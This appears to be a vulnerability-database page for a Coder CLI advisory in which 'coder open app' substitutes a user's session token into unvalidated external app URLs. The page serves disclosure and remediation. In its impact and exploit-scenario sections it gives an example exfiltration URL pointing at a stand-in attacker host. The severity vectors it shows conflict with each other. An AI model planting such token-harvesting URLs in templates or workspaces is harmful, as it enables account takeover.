Severity by source
AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Authenticated user (PR:L) must run the command (UI:R) against an attacker-authored workspace (AC:H); stolen token crosses trust boundary (S:C) enabling impersonation (C:H/I:H), no availability impact.
Primary rating from Vendor (https://github.com/coder/coder).
CVSS VectorNVD
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Lifecycle Timeline
5DescriptionNVD
Summary
coder open app opens external workspace-app URLs without validating the scheme or host. When an external app URL contains the $SESSION_TOKEN placeholder the CLI replaces it with the user's real session token before handing the URL to the OS open handler.
> Note: Practical exploitation requires the victim to run coder open app against a workspace whose external app definition the attacker controls. Only a malicious template author can control external app URLs.
Impact
Workspace code can register external apps with arbitrary URLs so an attacker who controls workspace contents can define a URL like https://attacker.example/?t=$SESSION_TOKEN. Running coder open app then sends the user's session token to the attacker and enables full account impersonation for the token's lifetime. The same path can invoke arbitrary local URI scheme handlers. Exploitation requires the user to run coder open app against a workspace that contains a malicious external app.
Patches
The fix applies a URL-scheme allowlist in the CLI and limits $SESSION_TOKEN substitution to trusted destinations like the web frontend.
The fix was backported to all supported release lines:
Workarounds
Avoid running coder open app for untrusted workspaces.
Resources
- Fix: #26146
Credits
Coder would like to thank Anthropic's Security Team (ANT-2026-22457) for independently disclosing this issue!
AnalysisAI
Session token leakage in Coder's CLI (github.com/coder/coder v2) lets a malicious template author steal a user's session token when the victim runs coder open app. The coder open app command opens external workspace-app URLs without scheme/host validation and substitutes the $SESSION_TOKEN placeholder with the user's real token before passing the URL to the OS open handler, so a workspace-controlled URL like https://attacker.example/?t=$SESSION_TOKEN exfiltrates the token and enables full account impersonation for its lifetime; the same path can invoke arbitrary local URI-scheme handlers. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires that (1) the victim has an authenticated Coder session (PR:L), (2) the victim runs the `coder open app` CLI command (UI:R), and (3) the target workspace contains an attacker-controlled external app definition whose URL includes the `$SESSION_TOKEN` placeholder - meaning the attacker must be a malicious template/workspace author. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The provided CVSS 3.1 vector (AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N, score 7.7 High) is internally consistent with the description: exploitation requires low privileges (an authenticated Coder user, PR:L), user interaction (the victim must run `coder open app`, UI:R), and higher attack complexity (AC:H) because the attacker must first get the victim to use a workspace whose malicious external app they control. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker publishes or contributes a Coder template that registers an external app with the URL `https://attacker.example/?t=$SESSION_TOKEN` and gets a victim to create a workspace from it. When the victim runs `coder open app`, the CLI substitutes their real session token into the URL and opens it, delivering the token to the attacker's server, which then impersonates the victim's account for the token's lifetime. … |
| Remediation | Upgrade to the patched release for your line - Vendor-released patch: v2.34.2 (2.34), v2.33.8 (2.33), v2.32.7 (2.32), or v2.29.17 (2.29 ESR); see GHSA-v54h-cp2w-9x4g and PR #26146. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
24 hours: Identify all Coder CLI v2 instances in use and current version levels across the organization. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-522 – Insufficiently Protected Credentials
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-42140
GHSA-v54h-cp2w-9x4g